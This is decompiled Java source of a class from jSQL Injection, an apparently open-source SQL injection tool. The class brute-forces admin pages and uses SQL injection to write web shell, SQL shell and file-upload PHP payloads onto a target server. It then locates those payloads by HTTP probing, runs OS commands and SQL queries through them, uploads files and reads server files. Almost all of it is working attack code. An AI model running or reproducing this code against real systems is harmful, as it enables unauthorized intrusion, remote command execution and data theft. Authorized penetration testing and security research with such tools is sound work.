package com.jsql.model.accessible;

import com.jsql.model.InjectionModel;
import com.jsql.model.bean.util.Header;
import com.jsql.model.bean.util.Interaction;
import com.jsql.model.bean.util.Request;
import com.jsql.model.exception.JSqlException;
import com.jsql.model.suspendable.SuspendableGetRows;
import com.jsql.model.suspendable.callable.ThreadFactoryCallable;
import com.jsql.util.ConnectionUtil;
import com.jsql.util.HeaderUtil;
import com.jsql.view.scan.ScanListTerminal;
import com.jsql.view.swing.MediatorGui;
import com.jsql.view.swing.list.ItemList;
import com.jsql.view.swing.list.ItemListScan;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.UnsupportedEncodingException;
import java.net.HttpURLConnection;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLEncoder;
import java.util.ArrayList;
import java.util.Collections;
import java.util.EnumMap;
import java.util.Iterator;
import java.util.List;
import java.util.UUID;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorCompletionService;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.commons.lang3.StringUtils;
import org.apache.log4j.Logger;

/* loaded from: input_file:com/jsql/model/accessible/RessourceAccess.class */
public class RessourceAccess {
    private static final Logger LOGGER = Logger.getRootLogger();
    private InjectionModel injectionModel;
    private boolean isSearchAdminStopped = false;
    private boolean isScanStopped = false;
    private boolean isSearchFileStopped = false;
    private boolean readingIsAllowed = false;
    private List<CallableFile> callablesReadFile = new ArrayList();
    public final String filenameWebshell = "..jw.php";
    public final String filenameSqlshell = ".js.php";
    public final String filenameUpload = ".ju.php";

    public RessourceAccess(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
    }

    public void createAdminPages(String str, List<ItemList> list) throws InterruptedException {
        String replaceAll = str.replaceAll("^https?://[^/]*", StringUtils.EMPTY);
        String replace = str.replace(replaceAll, StringUtils.EMPTY);
        String replaceAll2 = replaceAll.replaceAll("[^/]*$", StringUtils.EMPTY);
        ArrayList arrayList = new ArrayList();
        if (replaceAll2.split("/").length == 0) {
            arrayList.add("/");
        }
        for (String str2 : replaceAll2.split("/")) {
            arrayList.add(str2 + "/");
        }
        ExecutorService newFixedThreadPool = Executors.newFixedThreadPool(10, new ThreadFactoryCallable("CallableGetAdminPage"));
        ExecutorCompletionService executorCompletionService = new ExecutorCompletionService(newFixedThreadPool);
        StringBuilder sb = new StringBuilder();
        Iterator it = arrayList.iterator();
        while (it.hasNext()) {
            sb.append((String) it.next());
            Iterator<ItemList> it2 = list.iterator();
            while (it2.hasNext()) {
                executorCompletionService.submit(new CallableHttpHead(replace + sb.toString() + it2.next().toString(), this.injectionModel));
            }
        }
        int i = 0;
        int size = arrayList.size() * list.size();
        int i2 = 0;
        while (i2 < size && !this.isSearchAdminStopped) {
            try {
                CallableHttpHead callableHttpHead = (CallableHttpHead) executorCompletionService.take().get();
                if (callableHttpHead.isHttpResponseOk()) {
                    Request request = new Request();
                    request.setMessage(Interaction.CREATE_ADMIN_PAGE_TAB);
                    request.setParameters(callableHttpHead.getUrl());
                    this.injectionModel.sendToViews(request);
                    i++;
                    LOGGER.debug("Found admin page: " + callableHttpHead.getUrl());
                }
            } catch (InterruptedException | ExecutionException e) {
                LOGGER.error("Interruption while checking Admin pages", e);
                Thread.currentThread().interrupt();
            }
            i2++;
        }
        newFixedThreadPool.shutdown();
        newFixedThreadPool.awaitTermination(5L, TimeUnit.SECONDS);
        this.isSearchAdminStopped = false;
        String str3 = "Found " + i + " admin page" + (i > 1 ? 's' : StringUtils.EMPTY) + StringUtils.SPACE + (i2 != size ? "of " + i2 + " processed " : StringUtils.EMPTY) + "on " + size + " page" + (size > 1 ? 's' : StringUtils.EMPTY) + " searched";
        if (i > 0) {
            LOGGER.debug(str3);
        } else {
            LOGGER.warn(str3);
        }
        Request request2 = new Request();
        request2.setMessage(Interaction.END_ADMIN_SEARCH);
        this.injectionModel.sendToViews(request2);
    }

    public void createWebShell(String str, String str2) throws JSqlException, InterruptedException {
        if (isReadingAllowed()) {
            String replace = this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.web").replace(DataAccess.LEAD_IN_SHELL, DataAccess.LEAD).replace(DataAccess.TRAIL_IN_SHELL, DataAccess.TRAIL);
            String str3 = str;
            if (!str3.matches(".*/$")) {
                str3 = str3 + "/";
            }
            this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile(replace, str3 + this.filenameWebshell));
            String[] strArr = {StringUtils.EMPTY};
            try {
                String run = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead(str3 + this.filenameWebshell), strArr, false, 1, null);
                if (StringUtils.EMPTY.equals(run)) {
                    throw new JSqlException("payload integrity verification: Empty payload");
                }
                if (!str2.isEmpty()) {
                    str2 = str2.replaceAll("/*$", StringUtils.EMPTY) + "/";
                }
                String str4 = str2;
                if (StringUtils.EMPTY.equals(str4)) {
                    str4 = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase();
                }
                if (run.indexOf(replace) <= -1) {
                    throw new JSqlException("Incorrect Web payload integrity: " + strArr[0].trim().replaceAll("\\n", "\\\\\\n"));
                }
                LOGGER.debug("Web payload created into \"" + str3 + this.filenameWebshell + "\"");
                String replaceAll = str4.replaceAll("^https?://[^/]*", StringUtils.EMPTY);
                String replaceAll2 = "/".equals(replaceAll) ? str4.replaceAll("/+$", StringUtils.EMPTY) : str4.replace(replaceAll, StringUtils.EMPTY);
                String replaceAll3 = replaceAll.replaceAll("[^/]*$", StringUtils.EMPTY).replaceAll("/+", "/");
                ArrayList arrayList = new ArrayList();
                if (replaceAll3.split("/").length == 0) {
                    arrayList.add("/");
                }
                for (String str5 : replaceAll3.split("/")) {
                    arrayList.add(str5 + "/");
                }
                ExecutorService newFixedThreadPool = Executors.newFixedThreadPool(10, new ThreadFactoryCallable("CallableCreateWebShell"));
                ExecutorCompletionService executorCompletionService = new ExecutorCompletionService(newFixedThreadPool);
                StringBuilder sb = new StringBuilder();
                Iterator it = arrayList.iterator();
                while (it.hasNext()) {
                    sb.append((String) it.next());
                    executorCompletionService.submit(new CallableHttpHead(replaceAll2 + sb.toString() + this.filenameWebshell, this.injectionModel));
                }
                int size = arrayList.size() * 1;
                String str6 = null;
                for (int i = 0; i < size; i++) {
                    try {
                        CallableHttpHead callableHttpHead = (CallableHttpHead) executorCompletionService.take().get();
                        if (callableHttpHead.isHttpResponseOk()) {
                            str6 = callableHttpHead.getUrl();
                            if ((str2.isEmpty() || !str6.replace(this.filenameWebshell, StringUtils.EMPTY).equals(str2)) && !str6.replace(this.filenameWebshell, StringUtils.EMPTY).equals(replaceAll2 + replaceAll3)) {
                                LOGGER.debug("Connection to payload found at unexpected location \"" + str6 + "\"");
                            } else {
                                LOGGER.debug("Connection to payload found at expected location \"" + str6 + "\"");
                            }
                        } else {
                            LOGGER.trace("Connection to payload not found at \"" + callableHttpHead.getUrl() + "\"");
                        }
                    } catch (InterruptedException | ExecutionException e) {
                        LOGGER.error("Interruption while checking Web shell", e);
                        Thread.currentThread().interrupt();
                    }
                }
                newFixedThreadPool.shutdown();
                newFixedThreadPool.awaitTermination(5L, TimeUnit.SECONDS);
                if (str6 == null) {
                    LOGGER.warn("HTTP connection to Web payload not found");
                    return;
                }
                Request request = new Request();
                request.setMessage(Interaction.CREATE_SHELL_TAB);
                request.setParameters(str3.replace(this.filenameWebshell, StringUtils.EMPTY), str6);
                this.injectionModel.sendToViews(request);
            } catch (JSqlException e2) {
                throw new JSqlException("injected payload does not match source", e2);
            }
        }
    }

    private String runCommandShell(String str) throws IOException {
        String str2;
        String str3;
        HttpURLConnection httpURLConnection = (HttpURLConnection) new URL(str).openConnection();
        httpURLConnection.setReadTimeout(this.injectionModel.getMediatorUtils().getConnectionUtil().getTimeout().intValue());
        httpURLConnection.setConnectTimeout(this.injectionModel.getMediatorUtils().getConnectionUtil().getTimeout().intValue());
        try {
            str2 = ConnectionUtil.getSource(httpURLConnection);
        } catch (Exception e) {
            str2 = StringUtils.EMPTY;
        }
        Matcher matcher = Pattern.compile("(?s)<SqLi>(.*)<iLQS>").matcher(str2);
        matcher.find();
        try {
            str3 = matcher.group(1);
        } catch (IllegalStateException e2) {
            str3 = StringUtils.EMPTY;
            LOGGER.warn("Incorrect response from Web shell", e2);
        }
        EnumMap enumMap = new EnumMap(Header.class);
        enumMap.put((EnumMap) Header.URL, (Header) str);
        enumMap.put((EnumMap) Header.POST, (Header) StringUtils.EMPTY);
        enumMap.put((EnumMap) Header.HEADER, (Header) StringUtils.EMPTY);
        enumMap.put((EnumMap) Header.RESPONSE, (Header) HeaderUtil.getHttpHeaders(httpURLConnection));
        enumMap.put((EnumMap) Header.SOURCE, (Header) str2);
        Request request = new Request();
        request.setMessage(Interaction.MESSAGE_HEADER);
        request.setParameters(enumMap);
        this.injectionModel.sendToViews(request);
        return str3;
    }

    public void runWebShell(String str, UUID uuid, String str2) {
        String str3 = StringUtils.EMPTY;
        try {
            try {
                str3 = runCommandShell(str2 + "?c=" + URLEncoder.encode(str.trim(), "ISO-8859-1"));
                if (StringUtils.EMPTY.equals(str3)) {
                    str3 = "No result.\nTry \"" + str.trim() + " 2>&1\" to get a system error message.\n";
                }
                Request request = new Request();
                request.setMessage(Interaction.GET_WEB_SHELL_RESULT);
                request.setParameters(uuid, str3);
                this.injectionModel.sendToViews(request);
            } catch (UnsupportedEncodingException e) {
                LOGGER.warn("Encoding command to ISO-8859-1 failed: " + e.getMessage(), e);
                Request request2 = new Request();
                request2.setMessage(Interaction.GET_WEB_SHELL_RESULT);
                request2.setParameters(uuid, str3);
                this.injectionModel.sendToViews(request2);
            } catch (IOException e2) {
                LOGGER.warn("Shell execution error: " + e2.getMessage(), e2);
                Request request3 = new Request();
                request3.setMessage(Interaction.GET_WEB_SHELL_RESULT);
                request3.setParameters(uuid, str3);
                this.injectionModel.sendToViews(request3);
            }
        } catch (Throwable th) {
            Request request4 = new Request();
            request4.setMessage(Interaction.GET_WEB_SHELL_RESULT);
            request4.setParameters(uuid, str3);
            this.injectionModel.sendToViews(request4);
            throw th;
        }
    }

    public void createSqlShell(String str, String str2, String str3, String str4) throws JSqlException, InterruptedException {
        if (isReadingAllowed()) {
            String replace = this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.sql").replace(DataAccess.LEAD_IN_SHELL, DataAccess.LEAD).replace(DataAccess.TRAIL_IN_SHELL, DataAccess.TRAIL);
            String str5 = str;
            if (!str5.matches(".*/$")) {
                str5 = str5 + "/";
            }
            this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile(replace, str5 + this.filenameSqlshell));
            String[] strArr = {StringUtils.EMPTY};
            try {
                String run = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead(str5 + this.filenameSqlshell), strArr, false, 1, null);
                if (StringUtils.EMPTY.equals(run)) {
                    throw new JSqlException("payload integrity verification: Empty payload");
                }
                if (!str2.isEmpty()) {
                    str2 = str2.replaceAll("/*$", StringUtils.EMPTY) + "/";
                }
                String str6 = str2;
                if (StringUtils.EMPTY.equals(str6)) {
                    str6 = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase();
                }
                if (run.indexOf(replace) <= -1) {
                    throw new JSqlException("Incorrect SQL payload integrity: " + strArr[0].trim().replaceAll("\\n", "\\\\\\n"));
                }
                LOGGER.debug("SQL payload created into \"" + str5 + this.filenameSqlshell + "\"");
                String replaceAll = str6.replaceAll("^https?://[^/]*", StringUtils.EMPTY);
                String replaceAll2 = "/".equals(replaceAll) ? str6.replaceAll("/+$", StringUtils.EMPTY) : str6.replace(replaceAll, StringUtils.EMPTY);
                String replaceAll3 = replaceAll.replaceAll("[^/]*$", StringUtils.EMPTY).replaceAll("/+", "/");
                ArrayList arrayList = new ArrayList();
                if (replaceAll3.split("/").length == 0) {
                    arrayList.add("/");
                }
                for (String str7 : replaceAll3.split("/")) {
                    arrayList.add(str7 + "/");
                }
                ExecutorService newFixedThreadPool = Executors.newFixedThreadPool(10, new ThreadFactoryCallable("CallableCreateSqlShell"));
                ExecutorCompletionService executorCompletionService = new ExecutorCompletionService(newFixedThreadPool);
                StringBuilder sb = new StringBuilder();
                Iterator it = arrayList.iterator();
                while (it.hasNext()) {
                    sb.append((String) it.next());
                    executorCompletionService.submit(new CallableHttpHead(replaceAll2 + sb.toString() + this.filenameSqlshell, this.injectionModel));
                }
                int size = arrayList.size() * 1;
                String str8 = null;
                for (int i = 0; i < size; i++) {
                    try {
                        CallableHttpHead callableHttpHead = (CallableHttpHead) executorCompletionService.take().get();
                        if (callableHttpHead.isHttpResponseOk()) {
                            str8 = callableHttpHead.getUrl();
                            if ((str2.isEmpty() || !str8.replace(this.filenameSqlshell, StringUtils.EMPTY).equals(str2)) && !str8.replace(this.filenameSqlshell, StringUtils.EMPTY).equals(replaceAll2 + replaceAll3)) {
                                LOGGER.debug("Connection to payload found at unexpected location \"" + str8 + "\"");
                            } else {
                                LOGGER.debug("Connection to payload found at expected location \"" + str8 + "\"");
                            }
                        } else {
                            LOGGER.trace("Connection to payload not found at \"" + callableHttpHead.getUrl() + "\"");
                        }
                    } catch (InterruptedException | ExecutionException e) {
                        LOGGER.error("Interruption while checking SQL shell", e);
                        Thread.currentThread().interrupt();
                    }
                }
                newFixedThreadPool.shutdown();
                newFixedThreadPool.awaitTermination(5L, TimeUnit.SECONDS);
                if (str8 == null) {
                    LOGGER.warn("HTTP connection to SQL payload not found");
                    return;
                }
                Request request = new Request();
                request.setMessage(Interaction.CREATE_SQL_SHELL_TAB);
                request.setParameters(str5.replace(this.filenameSqlshell, StringUtils.EMPTY), str8, str3, str4);
                this.injectionModel.sendToViews(request);
            } catch (JSqlException e2) {
                throw new JSqlException("injected payload does not match source", e2);
            }
        }
    }

    public void runSqlShell(String str, UUID uuid, String str2, String str3, String str4) {
        String str5 = StringUtils.EMPTY;
        try {
            try {
                str5 = runCommandShell(str2 + "?q=" + URLEncoder.encode(str.trim(), "ISO-8859-1") + "&u=" + str3 + "&p=" + str4);
                if (str5.indexOf("<SQLr>") > -1) {
                    ArrayList<List> arrayList = new ArrayList();
                    Matcher matcher = Pattern.compile("(?si)<tr>(<td>.*?</td>)</tr>").matcher(str5);
                    while (matcher.find()) {
                        Matcher matcher2 = Pattern.compile("(?si)<td>(.*?)</td>").matcher(matcher.group(1));
                        ArrayList arrayList2 = new ArrayList();
                        arrayList.add(arrayList2);
                        while (matcher2.find()) {
                            arrayList2.add(matcher2.group(1));
                        }
                    }
                    if (!arrayList.isEmpty()) {
                        ArrayList arrayList3 = new ArrayList();
                        int[] iArr = {0};
                        while (iArr[0] < ((List) arrayList.get(0)).size()) {
                            Collections.sort(arrayList, (list, list2) -> {
                                return ((String) list2.get(iArr[0])).length() - ((String) list.get(iArr[0])).length();
                            });
                            arrayList3.add(Integer.valueOf(((String) ((List) arrayList.get(0)).get(iArr[0])).length()));
                            iArr[0] = iArr[0] + 1;
                        }
                        if (!StringUtils.EMPTY.equals(str5)) {
                            StringBuilder sb = new StringBuilder("+");
                            Iterator it = arrayList3.iterator();
                            while (it.hasNext()) {
                                sb.append("-" + StringUtils.repeat("-", ((Integer) it.next()).intValue()) + "-+");
                            }
                            sb.append(StringUtils.LF);
                            for (List<String> list3 : arrayList) {
                                sb.append("|");
                                int i = 0;
                                for (String str6 : list3) {
                                    sb.append(StringUtils.SPACE + str6 + StringUtils.repeat(StringUtils.SPACE, ((Integer) arrayList3.get(i)).intValue() - str6.length()) + " |");
                                    i++;
                                }
                                sb.append(StringUtils.LF);
                            }
                            sb.append("+");
                            Iterator it2 = arrayList3.iterator();
                            while (it2.hasNext()) {
                                sb.append("-" + StringUtils.repeat("-", ((Integer) it2.next()).intValue()) + "-+");
                            }
                            sb.append(StringUtils.LF);
                            str5 = sb.toString();
                        }
                    }
                } else if (str5.indexOf("<SQLm>") > -1) {
                    str5 = str5.replace("<SQLm>", StringUtils.EMPTY) + StringUtils.LF;
                } else if (str5.indexOf("<SQLe>") > -1) {
                    str5 = str5.replace("<SQLe>", StringUtils.EMPTY) + StringUtils.LF;
                }
                Request request = new Request();
                request.setMessage(Interaction.GET_SQL_SHELL_RESULT);
                request.setParameters(uuid, str5, str);
                this.injectionModel.sendToViews(request);
            } catch (UnsupportedEncodingException e) {
                LOGGER.warn("Encoding command to ISO-8859-1 failed: " + e.getMessage(), e);
                Request request2 = new Request();
                request2.setMessage(Interaction.GET_SQL_SHELL_RESULT);
                request2.setParameters(uuid, str5, str);
                this.injectionModel.sendToViews(request2);
            } catch (IOException e2) {
                LOGGER.warn("Shell execution error: " + e2.getMessage(), e2);
                Request request3 = new Request();
                request3.setMessage(Interaction.GET_SQL_SHELL_RESULT);
                request3.setParameters(uuid, str5, str);
                this.injectionModel.sendToViews(request3);
            }
        } catch (Throwable th) {
            Request request4 = new Request();
            request4.setMessage(Interaction.GET_SQL_SHELL_RESULT);
            request4.setParameters(uuid, str5, str);
            this.injectionModel.sendToViews(request4);
            throw th;
        }
    }

    public void uploadFile(String str, String str2, File file) throws JSqlException, IOException {
        int read;
        if (isReadingAllowed()) {
            String replace = this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.upload").replace(DataAccess.LEAD_IN_SHELL, DataAccess.LEAD);
            String str3 = str;
            if (!str3.matches(".*/$")) {
                str3 = str3 + "/";
            }
            this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile("<SqLi>" + replace + "<" + DataAccess.TRAIL + ">", str3 + this.filenameUpload));
            String[] strArr = {StringUtils.EMPTY};
            try {
                String run = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead(str3 + this.filenameUpload), strArr, false, 1, null);
                if (StringUtils.EMPTY.equals(run)) {
                    throw new JSqlException("Bad payload integrity: Empty payload");
                }
                String str4 = str2;
                if (StringUtils.EMPTY.equals(str4)) {
                    str4 = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().substring(0, this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().lastIndexOf(47) + 1);
                }
                if (run.indexOf(replace) <= -1) {
                    throw new JSqlException("Incorrect Upload payload integrity: " + strArr[0].trim().replaceAll("\\n", "\\\\\\n"));
                }
                LOGGER.debug("Upload payload deployed at \"" + str4 + this.filenameUpload + "\" in \"" + str3 + this.filenameUpload + "\"");
                URLConnection openConnection = new URL(str4 + "/" + this.filenameUpload).openConnection();
                openConnection.setDoOutput(true);
                FileInputStream fileInputStream = new FileInputStream(file);
                try {
                    byte[] bArr = new byte[fileInputStream.available()];
                    if (fileInputStream.read(bArr) == -1) {
                        throw new JSqlException("Error reading the file");
                    }
                    String str5 = (((StringUtils.EMPTY + "-----------------------------4664151417711\r\n") + "Content-Disposition: form-data; name=\"u\"; filename=\"" + file.getName() + "\"\r\n") + "Content-Type: binary/octet-stream\r\n") + "\r\n";
                    String str6 = StringUtils.EMPTY + "\r\n-----------------------------4664151417711--\r\n";
                    openConnection.setRequestProperty("Content-Type", "multipart/form-data; boundary=---------------------------4664151417711");
                    openConnection.setRequestProperty("Content-Length", String.valueOf(str5.length() + str6.length() + bArr.length));
                    OutputStream outputStream = openConnection.getOutputStream();
                    try {
                        outputStream.write(str5.getBytes());
                        int i = 0;
                        int i2 = 1024;
                        do {
                            if (i + i2 > bArr.length) {
                                i2 = bArr.length - i;
                            }
                            outputStream.write(bArr, i, i2);
                            i += i2;
                        } while (i < bArr.length);
                        outputStream.write(str6.getBytes());
                        outputStream.flush();
                        if (outputStream != null) {
                            outputStream.close();
                        }
                        InputStream inputStream = openConnection.getInputStream();
                        try {
                            byte[] bArr2 = new byte[512];
                            StringBuilder sb = new StringBuilder();
                            do {
                                read = inputStream.read(bArr2);
                                if (read > 0) {
                                    sb.append(new String(bArr2, 0, read));
                                }
                            } while (read > 0);
                            if (sb.indexOf("SqLiy") > -1) {
                                LOGGER.debug("File \"" + file.getName() + "\" uploaded into \"" + str3 + "\"");
                            } else {
                                LOGGER.warn("Upload file \"" + file.getName() + "\" into \"" + str3 + "\" failed");
                            }
                            EnumMap enumMap = new EnumMap(Header.class);
                            enumMap.put((EnumMap) Header.URL, (Header) str4);
                            enumMap.put((EnumMap) Header.POST, (Header) StringUtils.EMPTY);
                            enumMap.put((EnumMap) Header.HEADER, (Header) StringUtils.EMPTY);
                            enumMap.put((EnumMap) Header.RESPONSE, (Header) HeaderUtil.getHttpHeaders(openConnection));
                            enumMap.put((EnumMap) Header.SOURCE, (Header) sb.toString());
                            Request request = new Request();
                            request.setMessage(Interaction.MESSAGE_HEADER);
                            request.setParameters(enumMap);
                            this.injectionModel.sendToViews(request);
                            if (inputStream != null) {
                                inputStream.close();
                            }
                            fileInputStream.close();
                            Request request2 = new Request();
                            request2.setMessage(Interaction.END_UPLOAD);
                            this.injectionModel.sendToViews(request2);
                        } finally {
                        }
                    } finally {
                    }
                } catch (Throwable th) {
                    try {
                        fileInputStream.close();
                    } catch (Throwable th2) {
                        th.addSuppressed(th2);
                    }
                    throw th;
                }
            } catch (JSqlException e) {
                throw new JSqlException("Payload integrity verification failed: " + strArr[0].trim().replaceAll("\\n", "\\\\\\n"), e);
            }
        }
    }

    public boolean isReadingAllowed() throws JSqlException {
        if (this.injectionModel.getMediatorVendor().getVendor().instance().getModelYaml().getResource().getFile() == null) {
            LOGGER.warn("Reading file on " + this.injectionModel.getMediatorVendor().getVendor() + " is currently not supported");
            return false;
        }
        String[] strArr = {StringUtils.EMPTY};
        String run = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlPrivilegeTest(), strArr, false, 1, null);
        if (StringUtils.EMPTY.equals(run)) {
            this.injectionModel.sendResponseFromSite("Can't read privilege", strArr[0].trim());
            Request request = new Request();
            request.setMessage(Interaction.MARK_FILE_SYSTEM_INVULNERABLE);
            this.injectionModel.sendToViews(request);
            this.readingIsAllowed = false;
        } else if ("false".equals(run)) {
            LOGGER.warn("Privilege FILE is not granted to current user, files can't be read");
            Request request2 = new Request();
            request2.setMessage(Interaction.MARK_FILE_SYSTEM_INVULNERABLE);
            this.injectionModel.sendToViews(request2);
            this.readingIsAllowed = false;
        } else {
            Request request3 = new Request();
            request3.setMessage(Interaction.MARK_FILE_SYSTEM_VULNERABLE);
            this.injectionModel.sendToViews(request3);
            this.readingIsAllowed = true;
        }
        return this.readingIsAllowed;
    }

    public void readFile(List<ItemList> list) throws JSqlException, InterruptedException, ExecutionException {
        if (isReadingAllowed()) {
            int i = 0;
            ExecutorService newFixedThreadPool = Executors.newFixedThreadPool(10, new ThreadFactoryCallable("CallableReadFile"));
            ExecutorCompletionService executorCompletionService = new ExecutorCompletionService(newFixedThreadPool);
            Iterator<ItemList> it = list.iterator();
            while (it.hasNext()) {
                CallableFile callableFile = new CallableFile(it.next().toString(), this.injectionModel);
                executorCompletionService.submit(callableFile);
                this.callablesReadFile.add(callableFile);
            }
            ArrayList arrayList = new ArrayList();
            int size = list.size();
            int i2 = 0;
            while (i2 < size && !this.isSearchFileStopped) {
                CallableFile callableFile2 = (CallableFile) executorCompletionService.take().get();
                if (!StringUtils.EMPTY.equals(callableFile2.getSourceFile())) {
                    String substring = callableFile2.getPathFile().substring(callableFile2.getPathFile().lastIndexOf(47) + 1, callableFile2.getPathFile().length());
                    String sourceFile = callableFile2.getSourceFile();
                    String pathFile = callableFile2.getPathFile();
                    Request request = new Request();
                    request.setMessage(Interaction.CREATE_FILE_TAB);
                    request.setParameters(substring, sourceFile, pathFile);
                    this.injectionModel.sendToViews(request);
                    if (!arrayList.contains(pathFile.replace(substring, StringUtils.EMPTY))) {
                        LOGGER.info("Shell might be possible in folder " + pathFile.replace(substring, StringUtils.EMPTY));
                    }
                    arrayList.add(pathFile.replace(substring, StringUtils.EMPTY));
                    i++;
                }
                i2++;
            }
            Iterator<CallableFile> it2 = this.callablesReadFile.iterator();
            while (it2.hasNext()) {
                it2.next().getSuspendableReadFile().stop();
            }
            this.callablesReadFile.clear();
            newFixedThreadPool.shutdown();
            newFixedThreadPool.awaitTermination(5L, TimeUnit.SECONDS);
            this.isSearchFileStopped = false;
            String str = "Found " + i + " file" + (i > 1 ? 's' : StringUtils.EMPTY) + StringUtils.SPACE + (i2 != size ? "of " + i2 + " processed " : StringUtils.EMPTY) + "on " + size + " files checked";
            if (i > 0) {
                LOGGER.debug(str);
            } else {
                LOGGER.warn(str);
            }
            Request request2 = new Request();
            request2.setMessage(Interaction.END_FILE_SEARCH);
            this.injectionModel.sendToViews(request2);
        }
    }

    public void scanList(List<ItemList> list) {
        Request request = new Request();
        request.setMessage(Interaction.RESET_INTERFACE);
        this.injectionModel.sendToViews(request);
        try {
            Thread.sleep(500L);
        } catch (InterruptedException e) {
            LOGGER.error("Interruption while sleeping during scan", e);
            Thread.currentThread().interrupt();
        }
        this.injectionModel.deleteObservers();
        this.injectionModel.addObserver(new ScanListTerminal());
        this.injectionModel.setIsScanning(true);
        this.isScanStopped = false;
        Iterator<ItemList> it = list.iterator();
        while (it.hasNext()) {
            ItemListScan itemListScan = (ItemListScan) it.next();
            if (this.injectionModel.isStoppedByUser() || this.isScanStopped) {
                break;
            }
            LOGGER.info("Scanning " + itemListScan.getBeanInjection().getUrl());
            this.injectionModel.controlInput(itemListScan.getBeanInjection().getUrl(), itemListScan.getBeanInjection().getRequest(), itemListScan.getBeanInjection().getHeader(), itemListScan.getBeanInjection().getInjectionTypeAsEnum(), itemListScan.getBeanInjection().getRequestType(), true);
            try {
                Thread.sleep(500L);
            } catch (InterruptedException e2) {
                LOGGER.error("Interruption while sleeping between two scans", e2);
                Thread.currentThread().interrupt();
            }
        }
        this.injectionModel.addObserver(MediatorGui.frame().getObserver());
        this.injectionModel.setIsScanning(false);
        this.injectionModel.setIsStoppedByUser(false);
        this.isScanStopped = false;
        Request request2 = new Request();
        request2.setMessage(Interaction.END_SCAN);
        this.injectionModel.sendToViews(request2);
    }

    public void stopSearchingFile() {
        this.isSearchFileStopped = true;
        Iterator<CallableFile> it = this.callablesReadFile.iterator();
        while (it.hasNext()) {
            it.next().getSuspendableReadFile().stop();
        }
    }

    public boolean isSearchAdminStopped() {
        return this.isSearchAdminStopped;
    }

    public void setSearchAdminStopped(boolean z) {
        this.isSearchAdminStopped = z;
    }

    public void setScanStopped(boolean z) {
        this.isScanStopped = z;
    }

    public boolean isReadingIsAllowed() {
        return this.readingIsAllowed;
    }

    public void setReadingIsAllowed(boolean z) {
        this.readingIsAllowed = z;
    }
}
